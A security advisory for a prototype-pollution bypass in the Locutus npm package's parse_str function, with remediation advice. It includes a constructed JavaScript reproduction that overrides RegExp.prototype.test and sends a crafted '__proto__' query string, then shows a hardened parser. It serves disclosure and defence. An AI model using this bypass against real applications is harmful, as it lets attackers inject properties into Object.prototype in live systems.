Locutus Prototype Pollution Vulnerability in parse_str Function

Vulnerability

A prototype pollution vulnerability has been identified in the Locutus npm package, affecting versions from 2.0.39 up to, but not including, 3.0.25. The issue is in the parse_str function: its prototype pollution guard relies on RegExp.prototype.test, so an attacker who can override that method can then send a crafted query string to parse_str that bypasses the guard and writes into Object.prototype. The vulnerability is the result of an incomplete fix for a previous issue, CVE-2026-25521; that fix replaced a more robust guard with one that is easily circumvented.

Impact

Successful exploitation pollutes Object.prototype: the attacker injects properties that every plain object in the process then inherits. This can disrupt the application's prototype chain and amounts to hidden property injection, which becomes exploitable when application logic reads the injected properties (for example, as option or configuration values) or when other code acts on them. Note that the reproduction depends on overriding RegExp.prototype.test from inside the process, so the attacker needs some existing ability to run or influence JavaScript in the target; the crafted query string then completes the pollution.

Reproduction

To reproduce this vulnerability, first install an affected version of the Locutus package. Then override RegExp.prototype.test so that the guard's check no longer matches. Next, call parse_str with a query string whose keys target prototype keys, such as '__proto__', 'constructor', or 'prototype'. Finally, restore the original RegExp.prototype.test and check whether Object.prototype now carries the injected property.
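The following is an added example and not code from Locutus: a minimal parse_str-style parser (keyPath, pairs, assign, parseStrWeak are all constructed names) whose guard is consulted through RegExp.prototype.test, the reproduction steps above run against it, and a hardened variant (parseStrHardened, isPrototypeKey) that does not depend on any prototype method. The hardened version is my own hardening, not the change shipped in 3.0.25, and the query strings are constructed inputs.

```javascript
// Added example, not locutus code: a minimal parse_str-style parser whose
// prototype-pollution guard depends on RegExp.prototype.test, the bypass the
// advisory describes, and a hardened variant. Every input is constructed.

// Splits "a[b][c]" into ["a", "b", "c"]. String.prototype.match dispatches to
// RegExp.prototype[Symbol.match], not RegExp.prototype.test, so key parsing
// keeps working while test is overridden.
function keyPath(key) {
  const m = key.match(/^([^\[]*)((?:\[[^\]]*\])*)$/);
  if (!m) return [key];
  const rest = m[2] ? m[2].match(/\[[^\]]*\]/g).map((s) => s.slice(1, -1)) : [];
  return [m[1], ...rest];
}

// Yields [path, value] for each "k=v" pair in a query string.
function* pairs(query) {
  for (const pair of query.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const rawKey = eq === -1 ? pair : pair.slice(0, eq);
    const rawVal = eq === -1 ? '' : pair.slice(eq + 1);
    yield [
      keyPath(decodeURIComponent(rawKey.replace(/\+/g, ' '))),
      decodeURIComponent(rawVal.replace(/\+/g, ' ')),
    ];
  }
}

// Walks the path on target, creating intermediate containers as needed.
// With a plain {} target, the segment "__proto__" resolves to Object.prototype.
function assign(target, path, value, makeContainer) {
  let cur = target;
  for (let i = 0; i < path.length - 1; i++) {
    const next = cur[path[i]];
    if (typeof next !== 'object' || next === null) cur[path[i]] = makeContainer();
    cur = cur[path[i]];
  }
  cur[path[path.length - 1]] = value;
}

// Weak guard: a regex consulted through RegExp.prototype.test. If that method
// is replaced with one that never matches, every key passes the guard.
function parseStrWeak(query, target = {}) {
  const guard = /^(?:__proto__|constructor|prototype)$/;
  for (const [path, value] of pairs(query)) {
    if (path.some((seg) => guard.test(seg))) continue;
    assign(target, path, value, () => ({}));
  }
  return target;
}

// Hardened guard (my hardening, not the fix shipped in 3.0.25): a switch on the
// string uses language-level strict equality, which no prototype override can
// intercept, and every container has a null prototype, so even a missed key
// cannot reach Object.prototype through the "__proto__" accessor.
function isPrototypeKey(seg) {
  switch (seg) {
    case '__proto__':
    case 'constructor':
    case 'prototype':
      return true;
    default:
      return false;
  }
}

function parseStrHardened(query, target = Object.create(null)) {
  for (const [path, value] of pairs(query)) {
    if (path.some(isPrototypeKey)) continue;
    assign(target, path, value, () => Object.create(null));
  }
  return target;
}

// The advisory's reproduction: override RegExp.prototype.test, feed a query
// that targets __proto__, restore test, then inspect Object.prototype.
// Returns true if Object.prototype was polluted; removes the property afterwards.
function reproduce(parser) {
  const originalTest = RegExp.prototype.test;
  RegExp.prototype.test = function () { return false; };
  try {
    parser('__proto__[polluted]=yes&name=alice');
  } finally {
    RegExp.prototype.test = originalTest;
  }
  const polluted = Object.prototype.polluted === 'yes';
  delete Object.prototype.polluted;
  return polluted;
}

console.log('weak parser polluted Object.prototype:', reproduce(parseStrWeak));
console.log('hardened parser polluted Object.prototype:', reproduce(parseStrHardened));
```

To run the same steps against the real package, pass Locutus's parse_str (wrapped so it writes into a fresh plain object) to reproduce in place of parseStrWeak. The example also shows why the guard alone is the wrong layer to rely on: the hardened parser would stay safe even without its key check, because a null-prototype container has no inherited "__proto__" setter to walk through.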

Remediation

Upgrade to Locutus version 3.0.25 or later, where this vulnerability is fixed. Until the upgrade is in place, avoid passing untrusted query strings to parse_str, and treat any object it returns as potentially carrying attacker-controlled inherited properties.

Added: Mar 27, 2026, 11:22 PM
Updated: Mar 27, 2026, 11:22 PM

Vulnerability Rating

Custom Algorithm

spread: 5.4
impact: 2.5
exploitability: 5.1
remediation: 7.7
relevance: 4.7
threat: 4.8
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.